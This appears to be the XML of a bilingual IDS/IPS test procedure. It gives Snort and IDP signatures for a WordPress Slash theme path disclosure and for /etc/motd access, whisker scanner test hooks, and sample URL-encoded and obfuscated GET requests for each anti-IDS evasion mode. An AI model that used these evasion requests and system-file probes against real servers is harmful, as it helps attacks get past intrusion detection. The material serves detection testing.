    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t> alert TCP any any -&gt; any 80 (msg:"WEB Wordpress Slash Theme Full Path Disclosure Vulnerability"; uricontent:"/wp-content/themes/slash/index.php"; nocase; classtype:Web Attacks; priority:4; sid:1112686;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>2. Remove /usr/local/share/whisker/main.test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>3. Create /usr/local/share/whisker/main.test as following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>push @{$G_HOOKS{TESTS}}, \&amp;m_evasion_test;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>sub m_evasion_test {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>        wgeneral('/','wp-content/themes/slash/index.php',id=&gt;'1000');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>wp-content/themes/slash/index.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为攻击特征，根据需要修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">or </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>push @{$G_HOOKS{TESTS}}, \&amp;m_evasion_test;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>sub m_evasion_test {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>        wgeneral('/','etc/motd',id=&gt;'1000');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的预定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>/*1049406*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>idp_signature 6711:http</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">        signature: http_req_uri($1 &lt;&gt; /|2f|etc|2f|motd/i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">        port: any,[80];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>4. Setup test environment as following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> server &lt;---&gt; DUT &lt;---&gt; Whisker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc427594402"/>
      <w:bookmarkStart w:id="62" w:name="_Toc496014433"/>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="63" w:name="_Toc499884721"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逃逸工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>whisker</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持的逃逸模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>1. Execute following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00DE399A" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">   /usr/local/share/whisker/whisker.pl </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>h &lt;we</w:t>
      </w:r>
      <w:r>
        <w:t>b server IP&gt; -I &lt;Anti-IDS mode&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>-I 1 IDS-evasive mode 1 (URL encoding)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>-I 2 IDS-evasive mode 2 (/./ directory insertion)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>-I 3 IDS-evasive mode 3 (premature URL ending)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>-I 4 IDS-evasive mode 4 (long URL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>-I 5 IDS-evasive mode 5 (fake parameter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>-I 6 IDS-evasive mode 6 (TAB separation) (not NT/IIS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>-I 7 IDS-evasive mode 7 (case sensitivity)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>-I 8 IDS-evasive mode 8 (Windows delimiter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>-I 9 IDS-evasive mode 9 (session splicing) (slow)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>-I 0 I</w:t>
      </w:r>
      <w:r>
        <w:t>DS-evasive mode 0 (NULL method)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>For examples, followi</w:t>
      </w:r>
      <w:r>
        <w:t>ng will test modes from 0 to 9:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">/usr/local/share/whisker/whisker.pl </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">h 10.111.0.200 </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>I 1234567890</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>or </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">whisker </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">h 10.111.0.200 </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>I 1234567890 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（注：</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要大写）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:t>2. Test all combinations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>     1, 2, 3, 4, 5, 6, 7, 8, 9, 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>     12, 13, 14, ... 23, 24, 25 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>     123, 124, 125 ... 234, 235, 236 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>     ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>     1234567890</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>3. Packet dump:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t> Original:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>     /wp-content/themes/slash/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样本</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:object w:dxaOrig="153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9pt" o:ole="">
            <v:imagedata r:id="rId261" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1573626549" r:id="rId262"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>Mode 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     GET /%77p%2dc%6f%6et%65%6et/t%68em%65%73/sla%73h/%69%6ed%65x.p%68p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>Mode 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     GET /./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3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     GET /%20HTTP/1.1%0D%0A%Accept%3A%2066IrRro8qyFqfz4G64/../../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4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     GET /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5:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     GET /D7ELqlk7DPmkfep.html%3foqhpusBzIvVHPD=/..//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6:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     GET     /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7:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     GET /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8:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:t>     GET /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9:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     G</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     T</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     /</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>Mode 10:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     GET%00/wp-content/themes/slash/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>Mode 1,2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     GET /%2e%2f%77p%2d%63%6fn%74e%6e%74%2f./%74h%65me%73/%2e/%73%6c%61sh/%2e%2f%69n%64ex.p%68%70</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>Mode 1,2,3,4,5,6,7,8:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00DE399A" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>     GET     /%20HTTP/1.1%0D%0A%Accept%3A%20DephsxiczOdb/../../8u6LGvoPF81X.html%3fh0wyfI2UJyCJKsrmY=/..//.%5c%58F%44%5a%4fJ6%53JF%4cUMX%66DZ%4fj%36S%4a%46LU%4dX%66D%5a%4fj6%53%4a%46L%55MX%66%44%5a%4f%4a6%53%4a%46L%55M%58%66%44Z%4fJ6%53%4a%46%4c%55%4d%58%46D%5aOj%36SJF%4cUMX%46D%5aOj%36SJ%46LU%4dX%66D%5aOJ%36%53%4a%46L%55%4dX%46%44ZO%6a%36%53%4aFLUM%58%46DZOj6%53J%46%4cUM%58FDZ%4fJ6SJ%46%4cUM%58FD%5a%4fj6%53JFL%55%4dXF%44%5a%4fJ%36%53J%46%4cUMXFDZO%6a%36%53%4a%46%4cU%4d%58fDZ%4fJ%36S%4aFL%55%4d%58%66DZO%6a6%53J%46%4c%55%4dX%46DZO%4a6%53JF%4cUMX%46DZ%4fJ6%53%4aF%4c%55MXfDZ%4f%6a6S%4a%46L%55%4dX%46DZO%6a6S%4a%46%4c%55MX%46%44ZO%4a6S%4a%46LUM%58F%44Z%4fJ6%53J%46L%55%4dX%66D%5a%4f%6a6%53%4a%46LU%4d%58f%44Z%4fJ%36SJ%46%4cU%4dX%66D%5aO%6a%36SJF%4c%55%4dXF%44Z%4f%4a6SJF%4c%55MX%66%44%5a%4f%4a%36SJFLU%4dX%66D%5a%4fj6SJF%4cUMX%46D%5aOj%36SJ%46LU%4dXf%44%5aO%6a6S%4a%46LUM%58F%44%5aOJ6S%4a%46LU%4d%58fDZ%4f%4a6S%4a%46LUMX%46%44Z%4fJ6SJ%46LU%4dXfD%5aO%6a%36S%4a%46L%55MX%66%44%5aOJ6%53%4aF%4cU%4dX%66%44%5aOj%36%53J%46LUMX%66D%5aO%6a6%53JFLUM%58%46%44%5aO%4a%36%53%4a%46L%55%4dX%46%44ZO%4a6S%4aF%4c%55%4d%58f%44%5a%4fj6%53JFL%55%4d%5c.\%2e%2e%5c%2e\%57p-COnT%65Nt\.%5c%54h%65%6d%45S